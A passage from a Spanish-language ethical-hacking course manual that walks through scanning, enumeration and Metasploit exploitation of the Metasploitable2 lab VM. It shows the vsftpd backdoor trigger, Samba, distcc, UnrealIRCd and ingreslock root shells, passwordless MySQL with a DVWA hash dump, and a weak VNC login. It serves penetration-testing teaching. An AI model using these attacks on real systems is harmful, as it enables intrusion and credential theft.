Figura 6-2. Resultados obtenidos con nmap al escanear todos los puertos.
zenmap
https://nmap.org/zenmap/
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 44
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Zenmap es un GUI (Interfaz Gráfica de Usuario) oficial para el escaner Nmap. Es una aplicación libre
multiplataforma (Linux, Windows, Mac OS X, BSD, etc) y open source, el cual facilita el uso de nmap
a los principiantes, a la vez de proporcionar características avanzadas para los usuarios más
experimentados. Frecuentemente los escaneos utilizados pueden ser guardados como perfiles para
hacerlos más fáciles de ejecutar repetidamente. Un creador de comandos permite la creación
interactiva de líneas de comando para Nmap. Los resultados de Nmap pueden ser guardados y vistos
posteriormente. Los escaneos guardados pueden ser comparados, para ver si difieren. Los resultados
de los escaneos recientes son almacenados en una base de datos factible de ser buscada.
$ sudo zenmap-kbx
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 45
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
La determinación de los servicios en funcionamiento en cada puerto específico puede asegurar una
prueba de penetración satisfactoria sobre la red objetivo. También puede eliminar cualquier duda
generada durante el proceso de reconocimiento sobre la huella del sistema operativo.
Nmap
https://nmap.org/
Nmap puede indicar cuales puertos TCP o UDP está abiertos. Utilizando la base de datos de Nmap
de casi 2,200 servicios bien conocidos, Nmap podría reportar aquellos puertos correspondientes a
servidores de correo (SMTP), servidores web (HTTP), y servidores de nombres (DNS). Esta consulta
es usualmente precisa, la vasta mayoría de demonios en el puerto TCP 25 son de hecho servidores d
correo. Sin embargo, podría no ser preciso, pues se pueden ejecutar servicios en puertos extraños.
Después de descubrir los puertos TCP y UDP utilizando algunos de los escaneos proporcionados por
Nmap, la detección de versiones interroga estos puertos para determinar más sobre lo cual está
actualmente en funcionamiento. La base de datos de Nmap contiene pruebas para consultar diversos
servicios y expresiones de correspondencia para reconocer e interpretar las respuestas. Nmap intenta
determinar el protocolo del servicio(por ejemplo, FTP, SSH, Telnet, HTTP), el nombre de la aplicación
(por ejemplo, ISC BIND, Apache httpd, Solaris telnetd ), el número de versión, nombre del host, tipo
de dispositivo (ejemplo, impresora, encaminador), familia del sistema operativo (ejemplo, Windows,
Linux).
60e6638efbc612f9058f36b951767ec32414b841175460e63b225a3e40ecb45f
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 46
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Amap
https://tools.kali.org/information-gathering/amap
Amap fue una herramienta de primera generación para el escaneo. Intenta identificar aplicaciones
incluso si se están ejecutando sobre un puerto diferente al normal. También identifica aplicaciones
basados en no ASCII. Esto se logra enviando paquetes activadores, y consultando las respuestas en
una lista de cadenas de respuesta.
$ amap -h
La opción “-b” de amap imprime los banners en ASCII, en caso alguna sea recibida.
La opción “-q” de amap implica que todos los puertos cerrados o con tiempo de espera alto NO serán
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 47
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
La enumeración DNS es el procedimiento de localizar todos los servidores DNS y entradas DNS de
una organización objetivo, para capturar información crítica como nombres de usuarios, nombres de
computadoras, direcciones IP, y demás.
La enumeración SNMP permite realizar este procedimiento pero utilizado el protocolo SNMP, lo cual
puede permitir obtener información como software instalado, usuarios, tiempo de funcionamiento del
sistema, nombre del sistema, unidades de almacenamiento, procesos en ejecución y mucha más
información.
Para utilizar las dos herramientas siguientes es necesario modificar una línea en el archivo
/etc/snmp/snmpd.conf en Metasploitable2.
agentAddress udp:192.168.0.58:161
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 48
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Luego que se han realizado los cambios se debe proceder a iniciar el servicio snmpd, con el siguiente
comando:
snmpwalk
https://linux.die.net/man/1/snmpwalk
snmpwalk es una aplicación SNMP la cual utiliza peticiones GETNEXT para consultar una entidad de
red por un árbol de información.
Un OID (Object IDentifier) o Identificador de Objeto puede ser definido en la línea de comando. Este
OID especifica cual porción del espacio del identificar de objetivo será buscado utilizando peticiones
GETNEXT. Todas las variables en la rama a continuación del OID definido son consultados, y sus
valores presentados al usuario.
http://www.oid-info.com/
$ snmpwalk -h
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 49
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
snmp-check
https://www.nothink.org/codes/snmpcheck/index.php
Snmpcheck es una herramienta open source distribuida bajo la licencia GPL. Su objetivo es
automatizar el proceso de recopilar información de cualquier dispositivo con soporte al protocolo
SNMP (Windows, Linux, appliances de red, impresoras, etc.). Como snmpwalk, snmpcheck permite
enumerar dispositivos SNMP y pone la salida en una formato amigable para los seres humanos.
Pudiendo ser útil para pruebas de penetración o vigilancia de sistemas.
$ snmpcheck -h
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 50
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
$ snmpcheck 192.168.0.58
https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum
smtp-user-enum es una herramienta para enumerar cuentas de usuario a nivel del sistema operativo
mediante un servicio SMTP (sendmail). La enumeración se realiza mediante la inspección de las
respuestas a comandos VRFY, EXPN y RCTP TO. Esto podría ser adaptado para funcionar contra
otros demonios SMTP vulnerables.
$ smtp-user-enum -h
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 51
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
$ smtp-user-enum -M VRFY -U
/usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.0.58
La opción ”-M” de smtp-user-enum define el método a utilizar para adivinar los nombre de usuarios. El
método puede ser (EXPN, VRFY o RCPT), por defecto se utiliza VRFY.
La opción “-U” permite definir un archivo conteniendo los nombres de usuario a verificar mediante el
servicio SMTP.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 52
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
7. Mapear Vulnerabilidades
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 53
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Una vulnerabilidad local es aquella donde un atacante requiere acceso local previo para explotar una
vulnerabilidad, ejecutando una pieza de código. Al aprovecharse de este tipo de vulnerabilidad un
atacante puede elevar o escalar sus privilegios, para obtener acceso sin restricción en el sistema
objetivo.
Una Vulnerabilidad Remota es aquella en la cual el atacante no tiene acceso previo, pero la
vulnerabilidad puede ser explotada a través de la red. Este tipo de vulnerabilidad permite al atacante
obtener acceso a un sistema objetivo sin enfrentar ningún tipo de barrera física o local.
https://www.tenable.com/products/nessus
Nessus Professional es una solución para evaluaciones más ampliamente desplegada a nivel
mundial, la cual permite identificar vulnerabilidades, problemas de configuración, y malware, lo cual
es utilizado por los atacantes para penetrar la red o a los usuarios. Con amplio alcance, la última
inteligencia, actualizaciones rápidas, y una interfaz rápida, Nessus ofrece un paquete para el escaneo
de vulnerabilidades efectiva y completa a bajo costo.
Nessus Essentials permite escanear una red casera personal (hasta 16 direcciones IP por escaner)
con la misma velocidad, evaluaciones profundas y conveniencia de escaneo sin agente, la cual
disfrutan los subscriptores de Nessus.
Nesus Essentials:
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 54
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
https://www.tenable.com/products/nessus/nessus-essentials
https://www.tenable.com/downloads/nessus
Seleccionar la versión de Nessus para Debian 9, 10 / Kali Linux 1, 2017.3, 2018, 2019, 2020 AMD64
Una vez que finalizada la instalación de nessus y la ejecución del servidor, abrir la siguiente URL en
un navegador web.
https://127.0.0.1:8834
Para actualizar los plugins de Nessus se debe utilizar los siguientes comandos.
$ cd /opt/nessus/sbin
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 55
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Políticas
Se puede obtener más información sobre como crear un directiva en Nessus y obtener información
detallada sobre esta, en la siguiente página:
https://docs.tenable.com/nessus/Content/Policies.htm
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 56
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Escaneos
Se puede obtener más información sobre como crear un escaneo en Nessus y obtener información
detallada sobre esto, en la siguiente página:
https://docs.tenable.com/nessus/Content/Scans.htm
Un documento conteniendo información muy valiosa y útil es la Guía de Usuario de Nessus versión
8.15.x en idioma inglés, el cual puede ser visualizado en la siguiente página:
https://docs.tenable.com/nessus/Content/GettingStarted.htm
La versión 8.15.x de la Guía de Usuario de Nessus en idioma inglés puede ser descargado desde la
siguiente página:
https://docs.tenable.com/nessus/Content/PDF/Nessus_8_15.pdf
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 57
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Nmap Scripting Engine (NSE) es una de las características más poderosas y flexibles de Nmap.
Permite a los usuarios a escribir (y compartir) scripts sencillos para automatizar una amplia diversidad
de tareas para redes. Estos scripts son luego ejecutados en paralelo con la velocidad y eficiencia
esperada de Nmap. Los usuarios pueden confiar en el creciente y diverso conjunto de scripts
distribuidos por Nmap, o escribir los propios para satisfacer necesidades personales.
Los NSE han sido diseñados para ser versátiles, con las siguientes tareas en mente; descubrimiento
de la red, detección más sofisticada de las versiones, detección de vulnerabilidades, detección de
puertas traseras (backdoors), y explotación de vulnerabilidades.
https://nmap.org/book/nse.html
Para realizar un escaneo utilizando todos los NSE de la categoría “vuln” o vulnerabilidades utilizar el
siguiente comando.
La opción “--script” le indica a Nmap realizar un escaneo de scripts utilizando una lista de nombres de
archivos separados por comas, categorías de scripts, o directorios. Cada elemento en la lista puede
también ser una expresión booleana describiendo un conjunto de scripts más complejo.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 58
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
El listado completo e información detallada sobre las categorías y scripts NSE, se encuentran en la
siguiente página.
https://nmap.org/nsedoc/
1a8032e8e1fbaabc34e427308c400f04967404627fcb4bc8ab5ca80a8a49ab2a
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 59
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
8. Explotación
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 60
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Luego de haber descubierto las vulnerabilidades en los hosts o red objetivo, es momento de intentar
explotarlas. La fase de explotación algunas veces finaliza el proceso de la Prueba de Penetración,
pero esto depende del contrato, pues existen situaciones donde se debe ingresar de manera más
profunda en la red objetivo, esto con el propósito de expandir el ataque por toda la red y ganar todos
los privilegios posibles.
Todos los días se reportan diversos tipos de vulnerabilidades, pero en la actualidad solo una pequeña
parte de ellas son expuestas o publicadas de manera gratuita. Algunos de estos “exploits”, puede ser
descargados desde sitios webs donde se mantienen repositorios de ellos. Algunas de estas páginas
se detallan a continuación.
• 0day.today: https://0day.today/
• VulDB: https://vuldb.com/
Kali Linux mantiene un repositorio local de exploits de “Exploit-DB”. Esta base de datos local tiene un
script de nombre “searchsploit”, el cual permite realizar búsquedas dentro de esta base de datos
local.
$ searchsploit -h
$ searchsploit vsftpd
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 61
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Todos los exploits contenidos en este repositorio local está adecuadamente ordenados e
identificados. Para leer o visualizar el archivo de nombre “14489.c”, se pueden utilizar los siguientes
comando.
$ cd /usr/share/exploitdb/
$ ls -l
$ cd exploits/unix/remote
$ ls -l
$ less 14489.c
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 62
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Metasploit Framework (MSF) es más a únicamente una colección de exploits. Es una infraestructura
la cual puede ser construida y utilizada para necesidades propias. Esto permite concentrarse en un
único entorno, y no reinventar la rueda. MSF es considerado como una de las más sencillas y útiles
herramientas para auditorias, actualmente disponible libremente para los profesionales en seguridad.
Incluye una amplio arreglo de exploits con grado comercial, y un amplio entorno para el desarrollo de
exploits, permite utilizar herramientas para capturar información, como herramientas para la fase
posterior a la explotación. Eso hace a MSF un entorno verdaderamente impresionante.
Dado el hecho Metasploit Framework utiliza PostgreSQL como su Base de Datos, esta debe ser
iniciada primero, para luego iniciar la consola de Metasploit Framework.
Para verificar que el servicio se ha iniciado correctamente se debe ejecutar el siguiente comando.
$ msfconsole -h
# msfconsole
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 63
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
En el siguiente ejemplo se detalla el uso del módulo auxiliar “SSH Username Enumeration”. El cual
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 64
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Auxiliary action:
Name Description
---- -----------
Malformed Packet Use a malformed packet
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 65
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
ea0ef620b385518b060d6f566829972701579a4e45a754c731c5b240735b9e03
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 66
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 67
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Meterpreter es un Payload o carga útil avanzadao, dinámico y ampliable, el cual utiliza actores de
inyección DLL en memoria ,y se expande sobre la red en tiempo de ejecución. Este se comunica
sobre un actor socket y proporciona una completa interfaz Ruby en el lado del cliente.
Una vez obtenido acceso hacia objetivo de evaluación, se puede utilizar Meterpreter para entregar
Payloads (Cargas Útiles). Se utiliza MSFCONSOLE para manejar las sesiones, mientras Meterpreter
es la carga actual y tiene el deber de realizar la explotación.
https://www.exploit-db.com/exploits/17491/
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor
Análisis
La versión de vsftpd en funcionamiento en el sistema remoto ha sido compilado con una puerto
trasera. Al intentar autenticarse con un nombre de usuario conteniendo un :) (Carita sonriente) ejecuta
una puerta trasera, el cual genera una shell atendiendo en el puerto TCP 6200. El shell detiene su
atención después de que el cliente se conecta y desconecta.
Un atacante remoto sin autenticación puede explotar esta vulnerabilidad para ejecutar código
arbitrario como root.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 68
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
kali@kali:~$ nc -l -p 1234
kali@kali:~$ ftp
ftp> open 192.168.0.58
Connected to 192.168.0.58.
220 (vsFTPd 2.3.4)
Name (192.168.0.58:kali): usuario:)
331 Please specify the password.
Password:
Conexión al puerto 6200 para obtener una shell con privilegios de root.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447
https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script/
Análisis
La funcionalidad MS-RPC en smbd en Samba 3.0.0 hasta 3.0.25rc3, permite a los atacantes remotos
ejecutar comandos arbitrarios mediante metacaracteres shell involucrando la función (1)
SamrChangePassword, cuando la opción “username_map_script” en smb.conf está habiliado,
además permite a los usuarios remotos autenticados ejecutar comandos arbitrarios mediante
metacaracteres shell involucrando otras funciones MS-RPC en la impresora remota (2) y gestión de
archivos compartidos (3).
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 69
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Exploit target:
Id Name
-- ----
0 Automatic
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
GNU/Linux
id
uid=0(root) gid=0(root)
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 70
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0926
Análisis
El servidor Samba remoto está configurado de manera insegura y permite a un atacante remoto a
obtener acceso de lectura o posiblemente de escritura a cualquier archivo sobre el host afectado.
Especialmente, si un atacante tiene una cuenta válida en Samba para recurso compartido que es
escribible o hay un recurso escribile que está configurado con una cuenta de invitado, puede crear un
enlace simbólico utilizando una secuencia de recorrido de directorio y ganar acceso a archivos y
directorios fuera del recurso compartido.
Una explotación satisfactoria requiera un servidor Samba con el parámetro 'wide links' definido a 'yes',
el cual es el estado por defecto.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP RYDS
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 71
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 72
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba
3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP RYDS
kali@kali:~$ smbclient //192.168.0.58/tmp/ --option='client min protocol=NT1'
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jul 13 16:16:05 2021
.. DR 0 Mon Jan 11 21:53:13 2021
.ICE-unix DH 0 Tue Jul 13 14:53:02 2021
4439.jsvc_up R 0 Tue Jul 13 14:53:45 2021
.X11-unix DH 0 Tue Jul 13 14:53:17 2021
.X0-lock HR 11 Tue Jul 13 14:53:17 2021
rootfs DR 0 Mon Jan 11 21:53:13 2021
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 73
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Imagen 8-8. Conexión al recurso compartido \rootfs\ donde ahora reside la raíz de Metasploitable2
https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-1999-0651
Análisis
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 74
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
El host remoto está ejecutando el servicio 'rlogin'. Este servicio es peligroso en el sentido que no es
cifrado- es decir, cualquiera puede interceptar los datos que pasen a través del cliente rlogin y el
servidor rlogin. Esto incluye logins y contraseñas.
También, esto puede permitir una autenticación pobre sin contraseñas. Si el host es vulnerable a la
posibilidad de adivinar el número de secuencia TCP (Desde cualquier Red) o IP Spoofing (Incluyendo
secuestro ARP sobre la red local) entonces puede ser posible evadir la autenticación.
Finalmente, rlogin es una manera sencilla de activar el acceso de escritura un archivo dentro de
autenticaciones completas mediante los archivos .rhosts o rhosts.equiv.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556
https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server/
Análisis
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 75
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Exploit target:
Id Name
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 76
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
-- ----
0 Generic (Java Payload)
Análisis
Existe una puerta trasera (backdoor) en el puerto TCP 1524. Al establecer una conexión se despliega
una shell del sistema con los privilegios de root.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 77
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
root@metasploitable:/#
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/#
Análisis
Es posible conectarse a la base de datos MySQL remota utilizando una cuenta sin contraseña. Esto
puede permitir a un atacante a lanzar ataques contra la base de datos.
Matching Modules
================
Interact with a module by name or index. For example info 0, use 0 or use
auxiliary/admin/mysql/mysql_sql
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 78
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Manualmente:
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 79
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Database changed
MySQL [dvwa]> show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook |
| users |
+----------------+
2 rows in set (0.002 sec)
MySQL [dvwa]>
MySQL [dvwa]> SELECT * FROM users;
+---------+------------+-----------+---------
+----------------------------------
+-----------------------------------------------------+
| user_id | first_name | last_name | user | password
| avatar |
+---------+------------+-----------+---------
+----------------------------------
+-----------------------------------------------------+
| 1 | admin | admin | admin |
5f4dcc3b5aa765d61d8327deb882cf99 |
http://192.168.0.58/dvwa/hackable/users/admin.jpg |
| 2 | Gordon | Brown | gordonb |
e99a18c428cb38d5f260853678922e03 |
http://192.168.0.58/dvwa/hackable/users/gordonb.jpg |
| 3 | Hack | Me | 1337 |
8d3533d75ae2c3966d7e0d4fcc69216b |
http://192.168.0.58/dvwa/hackable/users/1337.jpg |
| 4 | Pablo | Picasso | pablo |
0d107d09f5bbe40cade3de5c71e9e9b7 |
http://192.168.0.58/dvwa/hackable/users/pablo.jpg |
| 5 | Bob | Smith | smithy |
5f4dcc3b5aa765d61d8327deb882cf99 |
http://192.168.0.58/dvwa/hackable/users/smithy.jpg |
+---------+------------+-----------+---------
+----------------------------------
+-----------------------------------------------------+
5 rows in set (0.003 sec)
MySQL [dvwa]>
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 80
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556
https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec/
Análisis
distcc 2.x, como la utilizada en Xcode 1.5 y otros, cuando no está configurado para restringir el
acceso hacia el puerto del servidor, permite a los atacantes remotos ejecutar comandos arbitrarios
mediante la compilación de trabajos, los cuales son ejecutados por el servidor sin verificaciones de
autorización.
Exploit target:
Id Name
-- ----
0 Automatic Target
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 81
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Exploit target:
Id Name
-- ----
0 Automatic Target
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
GNU/Linux
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 82
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
https://www.rapid7.com/db/modules/auxiliary/scanner/vnc/vnc_login/
Análisis
El servidor VNC funcionando en el host remoto está asegurado con una contraseña muy débil. Es
posible autenticarse utilizando la contraseña 'password'. Un atacante remoto sin autenticar puede
explotar esto para tomar control del sistema.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 83
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
541a1543f566bba54f34a1d88c75e06734623483e126cb3b0196ac5436394f49
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 84
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Imagen 8-6. Conexión mediante VNC a Metasploitable2, utilizando una contraseña débil
$ vncviewer 192.168.0.58
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 85
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2075
https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/
Análisis
UnrealIRCd 3.2.8.1, tal como fue distribuido sobre ciertos sitios espejo desde Noviembre del año
2009 hasta Junio del año 2010, contiene una modificación introducido externamente (Caballo de
Troya), en la macro DEBUG3_DOLOG_SYSTEM, la cual permite a los atacantes remotos ejecutar
comandos arbitrarios.
Compatible Payloads
===================
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 86
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
10 payload/cmd/unix/reverse_ruby_ssl normal No
Unix Command Shell, Reverse TCP SSL (via Ruby)
11 payload/cmd/unix/reverse_ssl_double_telnet normal No
Unix Command Shell, Double Reverse TCP SSL (telnet)
Exploit target:
Id Name
-- ----
0 Automatic Target
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 87
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
GNU/Linux
id
uid=0(root) gid=0(root)
Video del Webinar Gratuito: “Crear un Medio Infectado con Metasploit Framework”
https://www.reydes.com/d/?q=videos_2020#wgcumicmf
4f3fe553ed52b5e6cfd53959f310ac74d1bb42a54a36f2cdb9b38a983957d0fb
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 88
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
9. Atacar Contraseñas
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 89
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Cualquier servicio de red el cual solicite un usuario y contraseña es vulnerable a intentos para tratar
de adivinar credenciales válidas. Entre los servicios más comunes se enumeran; ftp, ssh, telnet, vnc,
rdp, entre otros. Un ataque de contraseñas en línea implica automatizar el proceso de adivinar las
credenciales para acelerar el ataque y mejorar las probabilidades de adivinar alguna de ellas.
THC Hydra
https://github.com/vanhauser-thc/thc-hydra
Existen diversas herramientas disponibles para atacar logins disponibles, sin embargo ninguna
soporta más de un protocolo a atacar o conexiones en paralelo.
Actualmente la herramienta soporta los siguientes protocolos; Asterisk, AFP, Cisco AAA, Cisco auth,
Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD,
HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener,
Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP,
